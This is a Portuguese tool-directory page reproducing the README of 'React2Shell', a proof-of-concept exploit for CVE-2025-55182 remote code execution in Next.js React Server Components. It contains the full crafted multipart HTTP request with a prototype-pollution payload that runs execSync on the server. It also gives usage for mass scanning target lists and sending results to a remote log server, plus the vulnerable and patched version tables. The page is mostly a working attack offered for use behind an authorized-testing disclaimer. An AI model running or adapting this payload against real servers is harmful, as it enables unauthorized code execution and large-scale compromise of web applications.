Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
React2Shell-Exploit-CVE-2025-55182 — React2Shell é um exploit de prova de conceito para CVE-2025-55182 que afeta implementações vulneráveis de React Server Components (RSC) no Next.js. | Kitploit
Ferramentas/GitHubGitHub/indra-031/react2shell-exploit-cve-2025-55182
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubindra-031/react2shell-exploit-cve-2025-55182

React2Shell-Exploit-CVE-2025-55182

React2Shell é um exploit de prova de conceito para CVE-2025-55182 que afeta implementações vulneráveis de React Server Components (RSC) no Next.js.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
1há 28 diasAinda não revisado

💀 Exploit React2Shell — CVE-2025-55182

root@kitploit:~
██████╗ ███████╗ █████╗  ██████╗████████╗██████╗ ███████╗██╗  ██╗███████╗██╗     ██╗
██╔══██╗██╔════╝██╔══██╗██╔════╝╚══██╔══╝╚════██╗██╔════╝██║  ██║██╔════╝██║     ██║
██████╔╝█████╗  ███████║██║        ██║    █████╔╝███████╗███████║█████╗  ██║     ██║
██╔══██╗██╔══╝  ██╔══██║██║        ██║   ██╔═══╝ ╚════██║██╔══██║██╔══╝  ██║     ██║
██║  ██║███████╗██║  ██║╚██████╗   ██║   ███████╗███████║██║  ██║███████╗███████╗███████╗
╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝   ╚═╝   ╚══════╝╚══════╝╚═╝  ╚═╝╚══════╝╚══════╝╚══════╝

🔥 Execução Remota de Código em React Server Components

CVE-2025-55182

Escrito por INDRA


⚠️ Isenção de Responsabilidade

Este projeto é fornecido apenas para fins educacionais, pesquisa de segurança e testes de penetração autorizados.

O autor não assume nenhuma responsabilidade por mau uso ou danos causados por este software.

Use este exploit apenas contra sistemas que você possui ou para os quais tenha permissão explícita para testar.


📖 Descrição

React2Shell é um exploit de prova de conceito para CVE-2025-55182 que afeta implementações vulneráveis de React Server Components (RSC) em Next.js.

O exploit envia uma requisição multipart elaborada que abusa do fluxo de desserialização vulnerável e extrai a saída de comandos por meio da resposta de digest de redirecionamento da aplicação.

Quando bem-sucedido, o exploit exibe a saída do comando executado diretamente no terminal.


✨ Funcionalidades

  • 🚀 Modo de Alvo Único
  • 🌍 Modo de Escaneamento em Massa
  • 🔄 Detecção Automática de HTTP e HTTPS
  • ⚡ Execução Multithread
  • 📝 Registro em Log Local Opcional
  • 🌐 Servidor de Log Remoto Opcional
  • 🎯 Saída Limpa
  • 🛡 Verificação SSL Desabilitada (para ambientes de teste)
  • 📂 Remoção de Alvos Duplicados

📦 Requisitos

Python 3.8+

Instale as dependências:

root@kitploit:~
pip install requests urllib3

📁 Estrutura do Projeto

root@kitploit:~
.
├── exploit.py
└── README.md

🔥 Versões Vulneráveis

React


Next.js

Vulneráveis

  • 14.3.0-canary.77 e posteriores
  • 15.x
  • 16.x

Corrigidas

  • 15.0.5
  • 15.1.9
  • 15.2.6
  • 16.0.7

📨 Requisição HTTP Utilizada

root@kitploit:~
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]

------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

🚀 Uso

Exibir Ajuda

root@kitploit:~
python exploit.py -h

Escanear Um Alvo

root@kitploit:~
python exploit.py -u https://target.com

Escanear Múltiplos Alvos

targets.txt

root@kitploit:~
target1.com
target2.com
target3.com

Execute

root@kitploit:~
python exploit.py -f targets.txt

Salvar Resultados

root@kitploit:~
python exploit.py -u https://target.com -o results.txt

Enviar Resultados para Servidor de Log Remoto

root@kitploit:~
python exploit.py -u https://target.com -l https://your-log-server.com

Tudo Junto

root@kitploit:~
python exploit.py -f targets.txt -o results.txt -l https://your-log-server.com

📋 Opções de Linha de Comando


🖥 Exemplo de Saída

root@kitploit:~
🚀 Loaded 42 targets (HTTP + HTTPS)

🔥 [VULNERABLE] https://target.com/

💀 Command Output →
uid=1000(node) gid=1000(node) groups=1000(node)

──────────────────────────────────────────────

⚙️ Como Funciona

  1. Lê o(s) alvo(s)
  2. Gera automaticamente URLs HTTP e HTTPS
  3. Envia requisição multipart elaborada
  4. Analisa o digest de redirecionamento
  5. Extrai a saída do comando
  6. Exibe a exploração bem-sucedida
  7. Opcionalmente, armazena os resultados localmente ou remotamente

📌 Notas

  • Testa automaticamente HTTP e HTTPS quando nenhum esquema é fornecido.
  • Alvos duplicados são removidos automaticamente.
  • Usa 30 threads concorrentes.
  • Ignora certificados SSL inválidos.
  • O timeout está definido para 10 segundos.

❤️ Créditos

  • Desenvolvimento do Exploit: INDRA
  • CVE: CVE-2025-55182

⚖️ Aviso Legal

O uso não autorizado deste software contra sistemas sem permissão pode violar leis locais, nacionais ou internacionais.

O autor não é responsável por qualquer mau uso.


⭐ Se este projeto ajudou na sua pesquisa, considere dar uma estrela.

Boas caçadas 🕷️

Baixar ferramenta
VersãoStatus
19.0⚠ Vulnerável
19.1.0⚠ Vulnerável
19.1.1⚠ Vulnerável
19.2.0⚠ Vulnerável
19.0.1✅ Corrigida
19.1.2✅ Corrigida
19.2.1✅ Corrigida
OpçãoDescrição
-uURL do alvo
-fArquivo contendo domínios alvo
-oSalvar alvos vulneráveis localmente
-lEnviar resultados para servidor de log remoto
-hExibir ajuda